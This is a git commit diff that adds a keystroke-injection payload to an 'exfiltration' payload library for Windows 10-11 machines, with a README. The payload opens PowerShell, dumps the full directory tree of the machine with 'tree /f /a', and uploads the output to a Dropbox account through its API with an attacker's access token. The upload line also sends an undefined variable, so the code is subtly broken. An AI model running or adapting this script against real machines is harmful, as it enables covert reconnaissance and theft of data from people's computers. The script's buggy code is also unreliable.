Merge pull request #176 from aleff-github/patch-43

Tree Structure Of The Operating System
2023-06-13 14:21:27 -04:00 · 2023-06-13 14:21:27 -04:00 · d0f3558987
parent 902b28252e ac22f858c3
commit d0f3558987
3 changed files with 66 additions and 0 deletions
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
@ -0,0 +1,28 @@
+# Tree Structure Of The Operating System
+
+This script allows the exfiltration of the structure of the files contained in a machine, through the use of the tree command in fact it is possible to know all the various links between files, folders and subfolders in a quick and graphically easy to understand way.
+
+**Category**: Exfiltration
+
+![](1.png)
+
+## Description
+
+This script allows the exfiltration of the structure of the files contained in a machine, through the use of the tree command in fact it is possible to know all the various links between files, folders and subfolders in a quick and graphically easy to understand way.
+
+Open a PowerShell and run the command `tree /f /a > out.txt` that permit to list the file name and not only the directories, using text characters instead of graphic characters to display rows linking subdirectories. Save all the output in the out.txt file and then send this file through Dropbox.
+
+## Dependencies
+
+* Firefox must be installed
+
+## Settings
+
+- You must define your Dropbox accessToken or modify the exfiltration modality.
+
+    `DEFINE #DROPBOX_ACCESS_TOKEN example`
+
+- The path to check can be changed putting the full-path `tree <full-path> /f /a > out.txt`.
+
+    - `tree \ /f /a > out.txt`
+    - `tree C:\Users\Aleff\Documents /f /a > out.txt`
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
@ -0,0 +1,38 @@
+REM ###########################################################
+REM #                                                         |
+REM # Title        : Tree Structure Of The Operating System   |
+REM # Author       : Aleff                                    |
+REM # Version      : 1.0                                      |
+REM # Category     : Exfiltration                             |
+REM # Target       : Windows 10-11                            |
+REM #                                                         |
+REM ###########################################################
+
+REM Requirements:
+REM     - Internet connection
+
+REM Set yout Dropbox access token
+DEFINE #DROPBOX_ACCESS_TOKEN example
+
+GUI r
+DELAY 1000
+STRINGLN PowerShell
+DELAY 1000
+
+REM Setting about exfiltration
+STRINGLN_BLOCK
+    tree /f /a > out.txt
+    $filePath=".\out.txt";
+    $accessToken="#DROPBOX_ACCESS_TOKEN"
+    $authHeader = @{Authorization = "Bearer $accessToken"}
+    $dropboxFilePath = "/out_exported.txt"
+
+    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+    $headers = @{}
+    $headers.Add("Authorization", "Bearer $accessToken")
+    $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+    $headers.Add("Content-Type", "application/octet-stream")
+
+    Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent; exit;
+END_STRINGLN